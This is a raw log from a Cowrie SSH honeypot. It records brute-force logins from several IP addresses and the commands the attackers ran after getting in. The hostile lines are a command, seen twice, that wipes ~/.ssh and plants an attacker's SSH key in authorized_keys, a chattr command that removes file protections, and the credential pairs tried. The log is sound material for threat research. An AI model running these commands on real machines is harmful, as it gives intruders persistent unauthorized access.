{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.031797Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:32.348085Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.348906Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.350982Z","src_ip":"134.199.174.250","session":"6db0d2c40ef7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.484630Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.485531Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35994,"dst_ip":"1.2.3.4","dst_port":22,"session":"039884d9dddc","protocol":"ssh","message":"New connection: 212.227.235.229:35994 (1.2.3.4:22) [session: 039884d9dddc]","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.610136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.611087Z","src_ip":"212.227.235.229","session":"039884d9dddc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:32.741786Z","src_ip":"212.227.235.229","session":"039884d9dddc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:33.299503Z","src_ip":"212.227.235.229","session":"039884d9dddc"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password1","message":"login attempt [ubuntu/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:33.594968Z","src_ip":"134.199.174.250","session":"6db0d2c40ef7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:34.431283Z","src_ip":"212.227.235.229","session":"039884d9dddc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36828,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e88ab2553ff","protocol":"ssh","message":"New connection: 212.227.235.229:36828 (1.2.3.4:22) [session: 6e88ab2553ff]","sensor":"my-vps","timestamp":"2025-09-08T13:08:34.562713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:34.563371Z","src_ip":"212.227.235.229","session":"6e88ab2553ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:34.696015Z","src_ip":"212.227.235.229","session":"6e88ab2553ff"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:34.944424Z","src_ip":"134.199.174.250","session":"6db0d2c40ef7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:08:35.262610Z","src_ip":"212.227.235.229","session":"6e88ab2553ff"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:35.396384Z","src_ip":"212.227.235.229","session":"6e88ab2553ff"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:35.399598Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40396,"dst_ip":"1.2.3.4","dst_port":22,"session":"caf82b9ed330","protocol":"ssh","message":"New connection: 212.227.235.229:40396 (1.2.3.4:22) [session: caf82b9ed330]","sensor":"my-vps","timestamp":"2025-09-08T13:08:48.194931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:48.195770Z","src_ip":"212.227.235.229","session":"caf82b9ed330"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:48.354844Z","src_ip":"212.227.235.229","session":"caf82b9ed330"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"123456789","message":"login attempt [testnet/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:49.025291Z","src_ip":"212.227.235.229","session":"caf82b9ed330"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:50.188110Z","src_ip":"212.227.235.229","session":"caf82b9ed330"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52050,"dst_ip":"1.2.3.4","dst_port":22,"session":"76b08c471914","protocol":"ssh","message":"New connection: 139.59.14.27:52050 (1.2.3.4:22) [session: 76b08c471914]","sensor":"my-vps","timestamp":"2025-09-08T13:08:52.805070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:52.805671Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:53.138623Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.login.success","username":"root","password":"QAZwsx123","message":"login attempt [root/QAZwsx123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:08:54.551795Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:55.252447Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:55.253119Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:55.254145Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:55.605049Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:56.403088Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:08:56.403762Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:08:56.748087Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:56.748937Z","src_ip":"139.59.14.27","session":"76b08c471914"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52066,"dst_ip":"1.2.3.4","dst_port":22,"session":"70414cddb922","protocol":"ssh","message":"New connection: 139.59.14.27:52066 (1.2.3.4:22) [session: 70414cddb922]","sensor":"my-vps","timestamp":"2025-09-08T13:08:57.099234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:57.100176Z","src_ip":"139.59.14.27","session":"70414cddb922"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:57.422916Z","src_ip":"139.59.14.27","session":"70414cddb922"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:58.770753Z","src_ip":"139.59.14.27","session":"70414cddb922"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:09:00.098721Z","src_ip":"139.59.14.27","session":"70414cddb922"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3ffd4262114","protocol":"ssh","message":"New connection: 139.59.14.27:52070 (1.2.3.4:22) [session: b3ffd4262114]","sensor":"my-vps","timestamp":"2025-09-08T13:09:00.421695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:09:00.422548Z","src_ip":"139.59.14.27","session":"b3ffd4262114"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:09:00.752480Z","src_ip":"139.59.14.27","session":"b3ffd4262114"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40162,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3f90957434b","protocol":"ssh","message":"New connection: 134.199.174.250:40162 (1.2.3.4:22) [session: d3f90957434b]","sensor":"my-vps","timestamp":"2025-09-08T13:09:01.199660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:09:01.202427Z","src_ip":"134.199.174.250","session":"d3f90957434b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 